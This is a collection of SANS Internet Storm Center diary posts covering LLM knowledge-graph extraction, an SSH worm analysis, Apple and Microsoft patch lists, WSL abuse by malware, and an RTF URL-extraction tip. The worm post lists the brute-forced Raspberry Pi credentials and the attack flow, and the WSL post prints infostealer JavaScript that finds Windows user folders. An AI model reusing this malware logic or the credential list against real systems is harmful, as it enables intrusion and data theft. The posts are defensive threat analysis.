Unstructured text to interactive knowledge graph via LLM & SPO triplet extraction

Courtesy of TLDR InfoSec Launches & Tools again, another fine discovery in Robert McDermott’s AI Powered Knowledge Graph Generator. Robert’s system takes unstructured text, uses your preferred LLM and extracts knowledge in the form of Subject-Predicate-Object (SPO) triplets, then visualizes the relationships as an interactive knowledge graph.[1]

Robert has documented AI Powered Knowledge Graph Generator (AIKG) beautifully, I’ll not be regurgitating it needlessly, so please read further for details regarding features, requirements, configuration, and options. I will detail a few installation insights that got me up and running quickly.
The feature summary is this:
AIKG automatically splits large documents into manageable chunks for processing and uses AI to identify entities and their relationships. As AIKG ensures consistent entity naming across document chunks, it discovers additional relationships between disconnected parts of the graph, then creates an interactive graph visualization. AIKG works with any OpenAI-compatible API endpoint; I used Ollama exclusively here with Google’s Gemma 3, a lightweight family of models built on Gemini technology. Gemma 3 is multimodal, processing text and images, and is the current, most capable model that runs on a single GPU. I ran my experimemts on a Lenovo ThinkBook 14 G4 circa 2022 with an AMD Ryzen 7 5825U 8-core processor, Radeon Graphics, and 40gb memory running Ubuntu 24.04.3 LTS.
My installation guidelines assume you have a full instance of Python3 and Ollama installed. My installation was implemented under my tools directory.

python3 -m venv aikg # Establish a virtual environment for AIKG
cd aikg
git clone https://github.com/robert-mcdermott/ai-knowledge-graph.git # Clone AIKG into virtual environment
bin/pip3 install -r ai-knowledge-graph/requirements.txt # Install AIKG requirements
bin/python3 ai-knowledge-graph/generate-graph.py --help # Confirm AIKG installation is functional
ollama pull gemma3 # Pull the Gemma 3 model from Ollama

I opted to test AIKG via a couple of articles specific to Russian state-sponsored adversarial cyber campaigns as input:

• CISA’s Cybersecurity Advisory Russian GRU Targeting Western Logistics Entities and Technology Companies May 2025
• SecurityWeek’s Russia’s APT28 Targeting Energy Research, Defense Collaboration Entities January 2026

My use of these articles in particular was based on the assertion that APT and nation state activity is often well represented via interactive knowledge graph. I’ve advocated endlessly for visual link analysis and graph tech, including Maltego (the OG of knowledge graph tools) at far back as 2009, Graphviz in 2015, GraphFrames in 2018 and Beagle in 2019. As always, visualization, coupled with entity relationship mappings, are an imperative for security analysts, threat hunters, and any security professional seeking deeper and more meaningful insights. While the SecurityWeek piece is a bit light on content and density, it served well as a good initial experiment.
The CISA advisory is much more dense and served as an excellent, more extensive experiment.
I pulled them both into individual text files more easily ingested for processing with AIKG, shared for you here if you’d like to play along at home.

Starting with SecurityWeek’s Russia’s APT28 Targeting Energy Research, Defense Collaboration Entities, and the subsequent Russia-APT28-targeting.txt file I created for model ingestion, I ran Gemma 3 as a 12 billion parameter model as follows:

ollama run gemma3:12b # Run Gemma 3 locally as 12 billion parameter model
~/tools/aikg/bin/python3 ~/tools/aikg/ai-knowledge-graph/generate-graph.py --config ~/tools/aikg/ai-knowledge-graph/config.toml -input data/Russia-APT28-targeting.txt --output Russia-APT28-targeting-kg-12b.html

You may want or need to run Gemma 3 with fewer parameters depending on the performance and capabilities of your local system. Note that I am calling file paths rather explicitly to overcome complaints about missing config and input files.
The article makes reference to APT credential harvesting activity targeting people associated with a Turkish energy and nuclear research agency, as well as a spoofed OWA login portal containing Turkish-language text to target Turkish scientists and researchers. As part of it’s use of semantic triples (Subject-Predicate-Object (SPO) triplets), how does AIKG perform linking entities, attributes and values into machine readable statements [2] derived from the article content, as seen in Figure 1?

Figure 1: AIKG Gemma 3:12b result from SecurityWeek article

Quite well, I’d say. To manipulate the graph, you may opt to disable physics in the graph output toolbar so you can tweak node placements. As drawn from the statistics view for this graph, AIKG generated 38 nodes, 105 edges, 52 extracted edges, 53 inferred edges, and four communities. You can further filter as you see fit, but even unfiltered, and with just a little by of tuning at the presentation layer, we can immediately see success where semantic triples immediately emerge to excellent effect. We can see entity/relationship connections where, as an example, threat actor –> targeted –> people and people –> associated with –> think tanks, with direct reference to the aforementioned OWA portal and Turkish language. If you’re a cyberthreat intelligence analyst (CTI) or investigator, drawing visual conclusions derived from text processing will really help you step up your game in the form of context and enrichment in report writing. This same graph extends itself to represent the connection between the victims and the exploitation methods and infrastructure. If you don’t want to go through a full installation process for yourself to complete your own model execution, you should still grab the JSON and HTML output files and experiment with them in your browser. You’ll get a real sense of the power and impact of an interactive knowledge graph with the joint forces power of LLM and SPO triplets.
For a second experiment I selected related content in a longer, more in depth analysis courtesy of a CISA Cybersecurity Advisory (CISA friends, I’m pulling for you in tough times). If you are following along at home, be sure to exit ollama so you can rerun it with additional parameters (27b vs 12b); pass /bye as a message, and restart:

ollama run gemma3:27b # Run Gemma 3 locally with 27 billion parameters
~/tools/aikg/bin/python3 ~/tools/aikg/ai-knowledge-graph/generate-graph.py --config ~/tools/aikg/ai-knowledge-graph/config.toml --input ~/tools/aikg/ai-knowledge-graph/data/Russian-GRU-Targeting-Logistics-Tech.txt --output Russian-GRU-Targeting-Logistics-Tech-kg-27b.html

Given the density and length of this article, the graph as initially rendered is a bit untenable (no fault of AIKG) and requires some tuning and filtering for optimal effect. Graph Statistics for this experiment included 118 nodes, 486 edges, 152 extracted edges, 334 inferred edges, and seven communities. To filter, with a focus again on actions taken by Russian APT operatives, I chose as follows:

• Select a Node by ID: threat actors
• Select a network item: Nodes
• Select a property: color
• Select value(s): #e41a1c (red)

The result is more visually feasible, and allows ready tweaking to optimize network connections, as seen in Figure 2.

???????

Figure 2: AIKG Gemma 3:27b result from CISA advisory

Shocking absolutely no one, we immediately encapsulate actor activity specific to credential access and influence operations via shell commands, Active Directory commands, and PowerShell commands. The conclusive connection is drawn however as threat actors –> targets –> defense industry. Ya think? ;-) In the advisory, see Description of Targets, including defense industry, as well as Initial Access TTPs, including credential guessing and brute force, and finally Post-Compromise TTPs and Exfiltration regarding various shell and AD commands. As a security professional reading this treatise, its reasonable to assume you’ve read a CISA Cybersecurity Advisory before. As such, its also reasonable to assume you’ll agree that knowledge graph generation from a highly dense, content rich collection of IOCs and behaviors is highly useful. I intend to work with my workplace ML team to further incorporate the principles explored herein as part of our context and enrichment generation practices. I suggest you consider the same if you have the opportunity. While SPO triplets, aka semantic triples, are most often associated with search engine optimization (SEO), their use, coupled with LLM power, really shines for threat intelligence applications.

Cheers…until next time.

Russ McRee | @holisticinfosec | infosec.exchange/@holisticinfosec | LinkedIn.com/in/russmcree

Recommended reading and tooling:

• Semantic Triples: Definition, Function, Components, Applications, Benefits, Drawbacks and Best Practices for SEO
• Russian GRU Targeting Western Logistics Entities and Technology Companies
• Russia’s APT28 Targeting Energy Research, Defense Collaboration Entities

References

[1] McDermott, R. (2025) AI Knowledge Graph. Available at: https://github.com/robert-mcdermott/ai-knowledge-graph (Accessed: 18 January 2026 - 11 February 2026).
[2] Reduan, M.H., (2025) Semantic Triples: Definition, Function, Components, Applications, Benefits, Drawbacks and Best Practices for SEO. Available at: https://www.linkedin.com/pulse/semantic-triples-definition-function-components-benefits-reduan-nqmec/ (Accessed: 11 February 2026).

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[This is a Guest Diary by Johnathan Husch, an ISC intern as part of the SANS.edu BACS program]

Weak SSH passwords remain one of the most consistently exploited attack surfaces on the Internet. Even today, botnet operators continue to deploy credential stuffing malware that is capable of performing a full compromise of Linux systems in seconds.

During this internship, my DShield sensor captured a complete attack sequence involving a self-spreading SSH worm that combines:

- Credential brute forcing
- Multi-stage malware execution
- Persistent backdoor creation
- IRC-based command and control
- Digitally signed command verification
- Automated lateral movement using Zmap and sshpass

Timeline of the Compromise
08:24:13   Attacker connects (83.135.10.12)
08:24:14   Brute-force success (pi / raspberryraspberry993311)
08:24:15   Malware uploaded via SCP (4.7 KB bash script)
08:24:16   Malware executed and persistence established
08:24:17   Attacker disconnects; worm begins C2 check-in and scanning

Figure 1: Network diagram of observed attack

Authentication Activity

The attack originated from 83.135.10.12, which traces back to Versatel Deutschland, an ISP in Germany [1]. 
The threat actor connected using the following SSH client:
SSH-2.0-OpenSSH_8.4p1 Raspbian-5+b1
HASSH: ae8bd7dd09970555aa4c6ed22adbbf56
The 'raspbian' strongly suggests that the attack is coming from an already compromised Raspberry Pi.

Post Compromise Behavior

Once the threat actor was authenticated, they immediately uploaded a small malicious bash script and executed it. 
Below is the attackers post exploitation sequence:

The uploaded and executed script was a 4.7KB bash script captured by the DShield sensor. The script performs a full botnet lifecycle. The first action the script takes is establishing persistence by performing the following: 

The threat actor then kills the processes for any competitors malware and alters the hosts file to add a known C2 server [2] as the loopback address

C2 Established

Interestingly, an embedded RSA key was active and was used to verify commands from the C2 operator. The script then joins 6 IRC networks and connects to one IRC channel: #biret

Once connected, the C2 server finishes enrollment by opening a TCP connection, registering the nickname of the device and completes registration. From here, the C2 performs life checks of the device by quite literally playing ping pong with itself. If the C2 server sends down "PING", then the compromised device must send back "PONG".

Lateral Movement and Worm Propagation

Once the C2 server confirms connectivity to the compromised device, we see the tools zmap and sshpass get installed. The device then conducts a zmap scan on 100,000 random IP addresses looking for a device with port 22 (SSH) open. For each vulnerable device, the worm attempts two sets of credentials:

- pi / raspberry
- pi / raspberryraspberry993311 

Upon successful authentication, the whole process begins again. 
While a cryptominer was not installed during this attack chain, the C2 server would most likely send down a command to install one based on the script killing processes for competing botnets and miners.

Why Does This Attack Matter

This attack in particular teaches defenders a few lessons:

Weak passwords can result in compromised systems. The attack was successful as a result of enabled default credentials; a lack of key based authentication and brute force protection being configured. 
IoT Devices are ideal botnet targets. These devices are frequently left exposed to the internet with the default credentials still active.
Worms like this can spread both quickly and quietly. This entire attack chain took under 4 seconds and began scanning for other vulnerable devices immediately after.

How To Combat These Attacks

To prevent similar compromises, organizations could:

- Disable password authentication and use SSH keys only
- Remove the default pi user on raspberry pi devices
- Enable and configure fail2ban
- Implement network segmentation on IoT devices

Conclusion

This incident demonstrates how a raspberry pi device with no security configurations can be converted into a fully weaponized botnet zombie. It serves as a reminder that security hardening is essential, even for small Linux devices and hobbyist systems.

[1] https://otx.alienvault.com/indicator/ip/83.135.10.12
[2] https://otx.alienvault.com/indicator/hostname/bins.deutschland-zahlung.eu
[3] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Today, Apple released updates for all of its operating systems (iOS, iPadOS, macOS, tvOS, watchOS, and visionOS). The update fixes 71 distinct vulnerabilities, many of which affect multiple operating systems. Older versions of iOS, iPadOS, and macOS are also updated.

OF special note is CVE-2026-20700. This vulnerability has already been exploited in targeted attacks. It allows attackers who can write to memory to execute code. Two vulnerabilities patched in December are related to the same attack (CVE-2025-14174 and CVE-2025-43529).

Interesting are additional Siri/Voice Over vulnerabilities that allow access to some information on locked devices. This is a recurring issue, and you should probably turn off VoiceOver and Siri on locked devices. Another recurring and likely impossible to completely eliminate threat is applications being able to access data from other applications. To reduce the probability of exploitation, limit the Apps you install on your devices.

iOS 26.3 and iPadOS 26.3	iOS 18.7.5 and iPadOS 18.7.5	macOS Tahoe 26.3	macOS Sequoia 15.7.4	macOS Sonoma 14.8.4	tvOS 26.3	watchOS 26.3	visionOS 26.3
CVE-2025-43338: Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory. Affects ImageIO
				x
CVE-2025-43402: An app may be able to cause unexpected system termination or corrupt process memory. Affects WindowServer
			x	x
CVE-2025-43403: An app may be able to access sensitive user data. Affects Compression
			x	x
CVE-2025-43417: An app may be able to access user-sensitive data. Affects File Bookmark
				x
CVE-2025-43537: Restoring a maliciously crafted backup file may lead to modification of protected system files. Affects Books
	x
CVE-2025-46283: An app may be able to access sensitive user data. Affects CoreServices
				x
CVE-2025-46290: A remote attacker may be able to cause a denial-of-service. Affects Security
			x	x
CVE-2025-46305: A malicious HID device may cause an unexpected process crash. Affects Multi-Touch
	x		x	x
CVE-2025-46310: An attacker with root privileges may be able to delete protected system files. Affects PackageKit
			x	x
CVE-2026-20601: An app may be able to monitor keystrokes without user permission. Affects Foundation
		x
CVE-2026-20602: An app may be able to cause a denial-of-service. Affects WindowServer
		x	x	x
CVE-2026-20603: An app with root privileges may be able to access private information. Affects Notification Center
		x
CVE-2026-20605: An app may be able to crash a system process. Affects Voice Control
	x	x	x	x
CVE-2026-20606: An app may be able to bypass certain Privacy preferences. Affects UIKit
x	x	x	x	x
CVE-2026-20608: Processing maliciously crafted web content may lead to an unexpected process crash. Affects WebKit
x	x	x					x
CVE-2026-20609: Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents. Affects CoreMedia
x	x	x	x	x	x	x	x
CVE-2026-20610: An app may be able to gain root privileges. Affects Setup Assistant
		x
CVE-2026-20611: Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory. Affects CoreAudio
x	x	x	x	x	x	x	x
CVE-2026-20612: An app may be able to access sensitive user data. Affects Spotlight
		x	x	x
CVE-2026-20614: An app may be able to gain root privileges. Affects Remote Management
		x	x	x
CVE-2026-20615: An app may be able to gain root privileges. Affects CoreServices
x		x		x			x
CVE-2026-20616: Processing a maliciously crafted USD file may lead to unexpected app termination. Affects Model I/O
	x	x		x			x
CVE-2026-20617: An app may be able to gain root privileges. Affects CoreServices
x		x		x	x	x	x
CVE-2026-20618: An app may be able to access user-sensitive data. Affects System Settings
		x
CVE-2026-20619: An app may be able to access sensitive user data. Affects System Settings
		x	x
CVE-2026-20620: An attacker may be able to cause unexpected system termination or read kernel memory. Affects GPU Drivers
		x	x	x
CVE-2026-20621: An app may be able to cause unexpected system termination or corrupt kernel memory. Affects Wi-Fi
x	x	x	x	x			x
CVE-2026-20623: An app may be able to access protected user data. Affects Foundation
		x
CVE-2026-20624: An app may be able to access sensitive user data. Affects AppleMobileFileIntegrity
		x	x	x
CVE-2026-20625: An app may be able to access sensitive user data. Affects AppleMobileFileIntegrity
		x	x	x			x
CVE-2026-20626: A malicious app may be able to gain root privileges. Affects Kernel
x		x	x				x
CVE-2026-20627: An app may be able to access sensitive user data. Affects CoreServices
x		x		x		x	x
CVE-2026-20628: An app may be able to break out of its sandbox. Affects Sandbox
x	x	x	x	x	x	x	x
CVE-2026-20629: An app may be able to access user-sensitive data. Affects Foundation
		x
CVE-2026-20630: An app may be able to access protected user data. Affects LaunchServices
		x
CVE-2026-20634: Processing a maliciously crafted image may result in disclosure of process memory. Affects ImageIO
x	x	x	x	x	x	x	x
CVE-2026-20635: Processing maliciously crafted web content may lead to an unexpected process crash. Affects WebKit
x	x	x			x	x	x
CVE-2026-20638: A user with Live Caller ID app extensions turned off could have identifying information leaked to the extensions. Affects Call History
x
CVE-2026-20640: An attacker with physical access to iPhone may be able to take and view screenshots of sensitive data from the iPhone during iPhone Mirroring with Mac. Affects UIKit
x
CVE-2026-20641: An app may be able to identify what other apps a user has installed. Affects StoreKit
x	x	x	x	x	x	x	x
CVE-2026-20642: A person with physical access to an iOS device may be able to access photos from the lock screen. Affects Photos
x
CVE-2026-20645: An attacker with physical access to a locked device may be able to view sensitive user information. Affects Accessibility
x	x
CVE-2026-20646: A malicious app may be able to read sensitive location information. Affects Weather
		x
CVE-2026-20647: An app may be able to access sensitive user data. Affects Siri
		x
CVE-2026-20648: A malicious app may be able to access notifications from other iCloud devices. Affects Siri
		x
CVE-2026-20649: A user may be able to view sensitive user information. Affects Game Center
x		x			x	x
CVE-2026-20650: An attacker in a privileged network position may be able to perform denial-of-service attack using crafted Bluetooth packets. Affects Bluetooth
x		x			x	x	x
CVE-2026-20652: A remote attacker may be able to cause a denial-of-service. Affects WebKit
x	x	x					x
CVE-2026-20653: An app may be able to access sensitive user data. Affects Shortcuts
x	x	x	x	x			x
CVE-2026-20654: An app may be able to cause unexpected system termination. Affects Kernel
x		x			x	x	x
CVE-2026-20655: An attacker with physical access to a locked device may be able to view sensitive user information. Affects Live Captions
x	x
CVE-2026-20656: An app may be able to access a user's Safari history. Affects Safari
	x	x
CVE-2026-20658: An app may be able to gain root privileges. Affects Security
		x
CVE-2026-20660: A remote user may be able to write arbitrary files. Affects CFNetwork
x	x	x		x			x
CVE-2026-20661: An attacker with physical access to a locked device may be able to view sensitive user information. Affects VoiceOver
x	x
CVE-2026-20662: An attacker with physical access to a locked device may be able to view sensitive user information. Affects Siri
		x	x
CVE-2026-20663: An app may be able to enumerate a user's installed apps. Affects LaunchServices
x	x
CVE-2026-20666: An app may be able to access sensitive user data. Affects NSOpenPanel
		x
CVE-2026-20667: An app may be able to break out of its sandbox. Affects libxpc
x		x	x	x		x
CVE-2026-20669: An app may be able to access sensitive user data. Affects Admin Framework
		x
CVE-2026-20671: An attacker in a privileged network position may be able to intercept network traffic. Affects Kernel
x	x	x	x	x	x	x	x
CVE-2026-20673: Turning off "Load remote content in messages? may not apply to all mail previews. Affects Mail
	x	x	x	x
CVE-2026-20674: An attacker with physical access to a locked device may be able to view sensitive user information. Affects Accessibility
x
CVE-2026-20675: Processing a maliciously crafted image may lead to disclosure of user information. Affects ImageIO
x	x	x	x	x	x	x	x
CVE-2026-20676: A website may be able to track users through Safari web extensions. Affects WebKit
x		x					x
CVE-2026-20677: A shortcut may be able to bypass sandbox restrictions. Affects Messages
x	x	x		x			x
CVE-2026-20678: An app may be able to access sensitive user data. Affects Sandbox Profiles
x	x
CVE-2026-20680: A sandboxed app may be able to access sensitive user data. Affects Spotlight
x	x	x	x	x
CVE-2026-20681: An app may be able to access information about a user's contacts. Affects Contacts
		x
CVE-2026-20682: An attacker may be able to discover a user's deleted notes. Affects Screenshots
x	x
CVE-2026-20700: An attacker with memory write capability may be able to execute arbitrary code. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-14174 and CVE-2025-43529 were also issued in response to this report.. Affects dyld
x		x			x	x	x

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

WSL or “Windows Subsystem Linux”[1] is a feature in the Microsoft Windows ecosystem that allows users to run a real Linux environment directly inside Windows without needing a traditional virtual machine or dual boot setup. The latest version, WSL2, runs a lightweight virtualized Linux kernel for better compatibility and performance, making it especially useful for development, DevOps, and cybersecurity workflows where Linux tooling is essential but Windows remains the primary operating system. It was introduced a few years ago (2016) as part of Windows 10.

WSL can be compared to a LOLBIN (living-off-the-land) because it’s implemented by Microsoft and allow many interesting operations. Attackers can drop Linux tools inside the WSL rootfs and execute it! Here is a quick example.

You can access the WSL root filesystem through the “\\wsl$” share name:

Once you copy a file into this directory, it becomes available in WSL:

The test.sh file is just a simple shell script.

But, more interesting, you can execute it from Windows too:

Pretty cool isn't it?

I found a malware sample that checks for the presence of WSL in its code. Written in JavaScript, it first implement a method called is_wsl():

"is_wsl": () => {
  if (process.env.WSL_DISTRO_NAME) {
    return true;
  }
  try {
    if (fs.existsSync("/proc/version")) {
      const I = fs.readFileSync("/proc/version", "utf8");
      if (I.toLowerCase().includes("microsoft") || I.toLowerCase().includes("wsl")) {
        return true;
      }
    }
  } catch (S) {}
  return false;
},

Another interesting one is get_wu() that will retrieve the username:

"get_wu": () => {
  try {
    const I = execSync("cmd.exe /c echo %USERNAME%", {
      "encoding": "utf8"
    }).trim();
    if (I && I.length > 0 && !I.includes("%USERNAME%")) {
      return I;
    }
  } catch (g) {}
  try {
    if (fs.existsSync("/mnt/c/Users")) {
      const Y = fs.readdirSync("/mnt/c/Users", {
        "withFileTypes": true
      });
      const w = ["Public", "Default", "All Users", "Default User"];
      for (const u of Y) {
        if (u.isDirectory() && !w.includes(u.name)) {
          return u.name;
        }
      }
    }
  } catch (M) {}
  return process.env.USERNAME || process.env.USER || null;
},

And later in the code:

if (is_wsl()) {
    const windowsUsername = get_wu();
    if (windowsUsername) {
        return getWindowsBrowserPaths(windowsUsername);
   }
}

If WSL is used, the /mnt directory is added in the list of interesting directories to process. This mount point provides indeed access to the host drives (C, D, ...)

if (is_wsl()) {
    priorityDirs.push(\"/mnt\");
}

The malware sample is "ottercookie-socketScript-module-3.js" (SHA256:f44c2169250f86c8b42ec74616eacb08310ccc81ca9612eb68d23dc8715d7370). It's an Cryxos trojan with infosteaker capabilities.

[1] https://learn.microsoft.com/en-us/windows/wsl/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Today's patch Tuesday addresses 59 different vulnerabilities (plus two Chromium vulnerabilities affecting Microsoft Edge). While this is a lower-than-normal number, this includes six vulnerabilities that are already exploited. Three vulnerabilities have already been exploited and made public. In addition, five critical vulnerabilities are included in this patch Tuesday.

Vulnerabilities of Interest:

The three already exploited and public vulnerabilities are very similar, but they affect different Windows components. The issue is that the user is not properly warned when executing code they downloaded. Technologies like SmartScreen are supposed to prevent this from happening. The components affect:

CVE-2026-21510: Windows Shell.

CVE-2026-21513: This affects the (legacy) Internet Explorer HTML rendering engine. It is still used by some Windows components, but not by the Edge browser. 

CVE-2026-21514: Microsoft Word.

In addition, we have three more already exploited vulnerabilities:

CVE-2026-21533: A privilege escalation in Remote Desktop

CVE-2026-21519: A type confusion vulnerability in Windows Manager

CVE-2026-21525: A Windows Remote Access Connection Manager Denial of Service.

Three of the critical vulnerabilities are related to Microsoft Azure and have already been patched by Microsoft. 

CVE-2026-23655 This vulnerability only affects Windows Defender on Linux and may lead to remote code execution.

 

Description
CVE	Disclosed	Exploited	Exploitability (old versions)	current version	Severity	CVSS Base (AVG)	CVSS Temporal (AVG)
.NET Spoofing Vulnerability
%%cve:2026-21218%%	No	No	-	-	Important	7.5	6.5
Azure Arc Elevation of Privilege Vulnerability
%%cve:2026-24302%%	No	No	-	-	Critical	8.6	7.5
Azure DevOps Server Cross-Site Scripting Vulnerability
%%cve:2026-21512%%	No	No	-	-	Important	6.5	5.7
Azure Front Door Elevation of Privilege Vulnerability
%%cve:2026-24300%%	No	No	-	-	Critical	9.8	8.5
Azure Function Information Disclosure Vulnerability
%%cve:2026-21532%%	No	No	-	-	Critical	8.2	7.1
Azure HDInsight Spoofing Vulnerability
%%cve:2026-21529%%	No	No	-	-	Important	5.7	5.0
Azure IoT Explorer Information Disclosure Vulnerability
%%cve:2026-21528%%	No	No	-	-	Important	6.5	5.7
Azure Local Remote Code Execution Vulnerability
%%cve:2026-21228%%	No	No	-	-	Important	8.1	7.1
Azure SDK for Python Remote Code Execution Vulnerability
%%cve:2026-21531%%	No	No	-	-	Important	9.8	8.5
Chromium: CVE-2026-1861 Heap buffer overflow in libvpx
%%cve:2026-1861%%	No	No	-	-	-
Chromium: CVE-2026-1862 Type Confusion in V8
%%cve:2026-1862%%	No	No	-	-	-
Cluster Client Failover (CCF) Elevation of Privilege Vulnerability
%%cve:2026-21251%%	No	No	-	-	Important	7.8	6.8
Desktop Window Manager Elevation of Privilege Vulnerability
%%cve:2026-21519%%	No	Yes	-	-	Important	7.8	6.8
GDI+ Denial of Service Vulnerability
%%cve:2026-20846%%	No	No	-	-	Important	7.5	6.5
GitHub Copilot and Visual Studio Code Remote Code Execution Vulnerability
%%cve:2026-21523%%	No	No	-	-	Important	8.0	7.0
GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability
%%cve:2026-21518%%	No	No	-	-	Important	6.5	5.7
GitHub Copilot and Visual Studio Elevation of Privilege Vulnerability
%%cve:2026-21257%%	No	No	-	-	Important	8.0	7.0
GitHub Copilot and Visual Studio Remote Code Execution Vulnerability
%%cve:2026-21256%%	No	No	-	-	Important	8.8	7.7
GitHub Copilot for Jetbrains Remote Code Execution Vulnerability
%%cve:2026-21516%%	No	No	-	-	Important	8.8	7.7
MSHTML Framework Security Feature Bypass Vulnerability
%%cve:2026-21513%%	Yes	Yes	-	-	Important	8.8	7.7
Mailslot File System Elevation of Privilege Vulnerability
%%cve:2026-21253%%	No	No	-	-	Important	7.0	6.1
Microsoft ACI Confidential Containers Elevation of Privilege Vulnerability
%%cve:2026-21522%%	No	No	-	-	Critical	6.7	6.0
Microsoft ACI Confidential Containers Information Disclosure Vulnerability
%%cve:2026-23655%%	No	No	-	-	Critical	6.5	5.7
Microsoft Defender for Endpoint Linux Extension Remote Code Execution Vulnerability
%%cve:2026-21537%%	No	No	-	-	Important	8.8	7.7
Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability
%%cve:2026-0391%%	No	No	-	-	Moderate	6.5	5.7
Microsoft Excel Elevation of Privilege Vulnerability
%%cve:2026-21259%%	No	No	-	-	Important	7.8	6.8
Microsoft Excel Information Disclosure Vulnerability
%%cve:2026-21258%%	No	No	-	-	Important	5.5	4.8
%%cve:2026-21261%%	No	No	-	-	Important	5.5	4.8
Microsoft Exchange Server Spoofing Vulnerability
%%cve:2026-21527%%	No	No	-	-	Important	6.5	5.7
Microsoft Outlook Spoofing Vulnerability
%%cve:2026-21260%%	No	No	-	-	Important	7.5	6.5
%%cve:2026-21511%%	No	No	-	-	Important	7.5	6.5
Microsoft Word Security Feature Bypass Vulnerability
%%cve:2026-21514%%	Yes	Yes	-	-	Important	7.8	7.2
Power BI Remote Code Execution Vulnerability
%%cve:2026-21229%%	No	No	-	-	Important	8.0	7.0
Red Hat, Inc. CVE-2023-2804: Heap Based Overflow libjpeg-turbo
%%cve:2023-2804%%	No	No	-	-	Important	6.5	5.7
Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
%%cve:2026-21236%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-21241%%	No	No	-	-	Important	7.0	6.1
%%cve:2026-21238%%	No	No	-	-	Important	7.8	6.8
Windows App for Mac Installer Elevation of Privilege Vulnerability
%%cve:2026-21517%%	No	No	-	-	Important	7.0	6.1
Windows Connected Devices Platform Service Elevation of Privilege Vulnerability
%%cve:2026-21234%%	No	No	-	-	Important	7.0	6.1
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2026-21246%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-21235%%	No	No	-	-	Important	7.3	6.4
Windows HTTP.sys Elevation of Privilege Vulnerability
%%cve:2026-21250%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-21240%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-21232%%	No	No	-	-	Important	7.8	6.8
Windows Hyper-V Remote Code Execution Vulnerability
%%cve:2026-21248%%	No	No	-	-	Important	7.3	6.4
%%cve:2026-21247%%	No	No	-	-	Important	7.3	6.4
%%cve:2026-21244%%	No	No	-	-	Important	7.3	6.4
Windows Hyper-V Security Feature Bypass Vulnerability
%%cve:2026-21255%%	No	No	-	-	Important	8.8	7.7
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2026-21245%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-21239%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-21231%%	No	No	-	-	Important	7.8	6.8
Windows Kernel Information Disclosure Vulnerability
%%cve:2026-21222%%	No	No	-	-	Important	5.5	4.8
Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability
%%cve:2026-21243%%	No	No	-	-	Important	7.5	6.5
Windows NTLM Spoofing Vulnerability
%%cve:2026-21249%%	No	No	-	-	Important	3.3	2.9
Windows Notepad App Remote Code Execution Vulnerability
%%cve:2026-20841%%	No	No	-	-	Important	8.8	7.7
Windows Remote Access Connection Manager Denial of Service Vulnerability
%%cve:2026-21525%%	No	Yes	-	-	Moderate	6.2	5.4
Windows Remote Desktop Services Elevation of Privilege Vulnerability
%%cve:2026-21533%%	No	Yes	-	-	Important	7.8	7.2
Windows Shell Security Feature Bypass Vulnerability
%%cve:2026-21510%%	Yes	Yes	-	-	Important	8.8	8.2
Windows Storage Elevation of Privilege Vulnerability
%%cve:2026-21508%%	No	No	-	-	Important	7.0	6.1
Windows Subsystem for Linux Elevation of Privilege Vulnerability
%%cve:2026-21242%%	No	No	-	-	Important	7.0	6.1
%%cve:2026-21237%%	No	No	-	-	Important	7.0	6.1

 

 

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Malicious RTF (Rich Text Format) documents are back in the news with the exploitation of CVE-2026-21509 by APT28.

The malicious RTF documents BULLETEN_H.doc and Consultation_Topics_Ukraine(Final).doc mentioned in the news are RTF files (despite their .doc extension, a common trick used by threat actors).

Here is a quick tip to extract URLs from RTF files. Use the following command:

rtfdump.py -j -C SAMPLE.vir | strings.py --jsoninput | re-search.py -n url -u -F officeurls

Like this:

BTW, if you are curious, this is how that document looks like when opened:

Let me break down the command:

• rtfdump.py -j -C SAMPLE.vir: this parses RTF file SAMPLE.vir and produces JSON output with the content of all the items found in the RTF document. Option -C make that all combinations are included in the JSON data: the item itself, the hex-decoded item (-H) and the hex-decoded and shifted item (-H -S). So per item found inside the RTF file, 3 entries are produced in the JSON data.
• strings.py --jsoninput: this takes the JSON data produced by rtfdump.py and extract all strings
• re-search.py -n url -u -F officeurls: this extracts all URLs (-n url) found in the strings produced by strings.py, performs a deduplication (-u) and filters out all URLs linked to Office document definitions (-F officeurls)

